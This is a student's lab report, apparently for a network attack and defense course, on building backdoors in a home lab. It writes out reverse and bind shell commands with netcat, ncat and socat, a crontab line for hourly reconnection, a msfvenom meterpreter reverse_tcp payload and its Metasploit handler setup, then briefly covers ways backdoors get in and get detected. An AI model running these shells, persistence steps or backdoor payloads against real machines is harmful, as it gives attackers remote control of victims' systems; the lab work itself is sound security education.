一、实验内容


1.使用netcat获取主机操作Shell,cron启动

2.使用socat获取主机操作Shell, 任务计划启动

3.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

4.使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝


二、实验步骤

2.1 使用netcat获取主机操作Shell,cron启动

2.1.1 windows下获得一个linux shell

step1. 在Windows中使用ipconfig查看本机ip地址

step2. 在Windows中使用ncat.exe程序打开监听

 ncat.exe -l -p 2318

step3. 在kali中反弹连接Windows

ncat 192.168.88.1 2318 -e /bin/sh

step4. Windows成功获得kali的shell,并使用ls命令查看当前目录

2.1.2 Linux 下获得Windows的cmd程序,cron启动

step1.
在Windows系统下,监听2318端口

 ncat.exe -l -p 2318

step2.在Kali环境下,用crontab -e指令编辑一条定时任务,选择编辑器时选择3

step3.在最后一行添加

10 * * * * /bin/netcat 192.168.88.1 2318 -e /bin/sh  //在每小时的第10分钟反向连接Windows主机的2318端口

step4.时间到达10分时,如下图所示:

2.2 使用socat获取主机操作Shell, 任务计划启动

2.2.1 Linux 下获得Windows的cmd程序

step1.在kali中使用ifconfig查看IP

step2.在kali中打开监听

nc -l -p 2318

step3.在Windows中反弹连接kali

ncat.exe -e cmd.exe 192.168.187.128 2318

step4.kali成功获得Windows的命令提示,并使用dir命令查看当前目录

2.2.2 使用socat获取主机操作Shell, 任务计划启动

step1.在“任务计划程序”中“创建任务”

step2.填写任务名

step3.填写触发器

step4.填写操作,导入socat.exe的路径,并添加参数:tcp-listen:2318 exec:cmd.exe,pty,stderr(把cmd.exe绑定到端口2318,同时把cmd.exe的stderr重定向到stdout上)

step5.到达约定时间后,在Kali环境下输入指令

socat -tcp:192.168.88.1:2318

此时可以发现已经成功获得了WINDOWSd的cmd shell

2.3 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

step1.在Kali上执行指令

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.187.128 LPORT=2318 -f exe > 20162318_backdoor.exe

step2.在Windows下执行

ncat.exe -lv 2318 > 20162318_backdoor.exe

step3.在Linux中执行

nc 192.168.88.1 2318 < 20162318_backdoor.exe

step4.在Kali上输入msfconsole指令进入msf控制台

root@20162318:~# msfconsole

step5.依次输入

use exploit/multi/handler //使用监听模块,设置payload
set payload windows/meterpreter/reverse_tcp /使用和生成后门程序时相同的payload
set LHOST 192.168.187.128 //设置ip
set LPORT 2318 //设置端口

step6.使用exploit开始监听

step7.运行Windows下的后门程序

step8.Linux获得Windows主机的连接,并且得到了远程控制的shell

2.4使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

step1.完成2.3的全部操作

step2.使用screenshot指令进行截屏

step3.尝试提权和获取摄像头权限失败

三、基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

当我们打开一个钓鱼邮件时,如果后台自动下载并安装木马程序,自动运行,因此在系统留下后门。

下载游戏修改器也可能会有后门

(2)例举你知道的后门如何启动起来(win及linux)的方式?

打开一些游戏的作弊器

通过修改注册表设置为开机自启动

(3)Meterpreter有哪些给你映像深刻的功能

截取受害主机的图片,获取录音等等

(4)如何发现自己有系统有没有被安装后门?

定期使用杀毒软件进行杀毒

四、实验总结与体会

本次实验使我明白了后门的可怕之处,所以以后要在正规网站下载正规软件,不下载游戏外挂之类可能会藏有后门的软件,其次是定期使用杀毒软件进行杀毒,防止存在有后门软件的软件的存在。

2018-2019-2 20162318《网络对抗技术》Exp2 后门原理与实践的更多相关文章

  1. 2019-2020-2 20175226 王鹏雲 网络对抗技术 Exp2 后门原理与实践

    2019-2020-2 20175226 王鹏雲 网络对抗技术 Exp2 后门原理与实践 实验内容 使用netcat获取主机操作Shell,cron启动: 使用socat获取主机操作Shell, 任务 ...

  2. 20155326刘美岑 《网络对抗》Exp2 后门原理与实践

    20155326刘美岑 <网络对抗>Exp2 后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启 ...

  3. 20155320《网络对抗》Exp2 后门原理与实践

    20155320<网络对抗>Exp2 后门原理与实践 [实验内容] (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, ...

  4. 20155324《网络对抗》Exp2 后门原理与实践

    20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...

  5. 20155208徐子涵《网络对抗》Exp2 后门原理与实践

    20155208徐子涵<网络对抗>Exp2 后门原理与实践 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 答:当我们在非官方网站上下载软件时,后门极有可能会进入我们 ...

  6. 20145236《网络对抗》Exp2 后门原理与实践

    20145236<网络对抗>Exp2 后门原理与实践 目录: 一.基础问题回答 二.常用后门工具实践 2.1 Windows获得Linux Shell 2.2 Linux获得Windows ...

  7. 20155202 张旭《网络对抗》Exp2 后门原理与实践

    20155202 张旭<网络对抗>Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 捆绑在软件中 注入在可执行文件里 注入在office文件的宏里面 ...

  8. 20155218《网络对抗》Exp2 后门原理与实践

    20155218<网络对抗>Exp2 后门原理与实践 常用后门工具实践 1.Windows获得Linux Shell: 在Windows下,先使用ipconfig指令查看本机IP,使用nc ...

  9. 20155227《网络对抗》Exp2 后门原理与实践

    20155227<网络对抗>Exp2 后门原理与实践 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 在非官方网站下载软件时,后门很可能被捆绑在软件中. 攻击者利用欺 ...

  10. 20155232《网络对抗》Exp2 后门原理与实践

    20155232<网络对抗>Exp2 后门原理与实践 问题回答 1.例举你能想到的一个后门进入到你系统中的可能方式? 通过网页上弹出来的软件自动安装 2.例举你知道的后门如何启动起来(wi ...

随机推荐

  1. 【Java基础】JAVA不可变类(immutable)机制与String的不可变性

    一.不可变类简介 不可变类:所谓的不可变类是指这个类的实例一旦创建完成后,就不能改变其成员变量值.如JDK内部自带的很多不可变类:Interger.Long和String(8种基本数据类型的包装类和S ...

  2. python函数,模块及eclipse配置python开发环境

    一.eclipse的使用 1.作用 (1)最好用的IDE (2)可调式debug (3)查看可执行过程 (4)可查看源代码 2.安装eclipse及配置 目录安装Pythonpython for ec ...

  3. 随机数生成 && 生成执行锁

    生成随机数列: openssl rand -base64 uuidgen echo $RANDOM | md5sum echo $RANDOM | sha256sum 随机小写10个字母 随机数: [ ...

  4. C++如何判断大小端

    http://bbs.chinaunix.net/thread-1257205-1-1.html #include <stdio.h>#include <string.h>#i ...

  5. CSS--盒子模型详解

    目录 图解 盒模型尺寸基准 使用浏览器的开发者工具,查看元素高(宽)度时,遇到的问题 一.图解 说明:由内而外依次是content.padding(内边距).border(边框).margin(外边距 ...

  6. phpStudy配置https

    phpStudy配置https 1.打开vhosts-conf配置文件 2.在配置文件中增加如下内容 server { listen 443; server_name tam.gogugong.com ...

  7. php-fpm和cgi,并发响应的理解以及高并发和多线程的关系

    首先搞清楚php-fpm与cgi的关系 cgi cgi是一个web server与cgi程序(这里可以理解为是php解释器)之间进行数据传输的协议,保证了传递的是标准数据. php-cgi php-c ...

  8. 洛谷P2002消息扩散

    传送门啦 这个题就是tarjan强连通分量与入度的例题了. 思路: 利用缩点的思想,先预处理一下所有的强连通分量,然后把每个强连通分量内的所有节点看做一个节点,然后处理一张新图,然后检查每个点的入度, ...

  9. eclipse中Maven项目jar问题

    eclipse中Maven项目jar包下载下来了,不然我们import是时候根本导入不进来,网上的方法都试过了,Maven仓库也清空过后重新下载过了,都解决不了. 后来发现虽然jar包是下载下来了,可 ...

  10. 使用jsplumb的一些笔记

    欢迎就是需要使用jsplumb跟正在使用jsplumb的一起讨论 欢迎私聊 1.关于jsplumb的connection的一些事件 ####connection拖动的事件 instance.bind( ...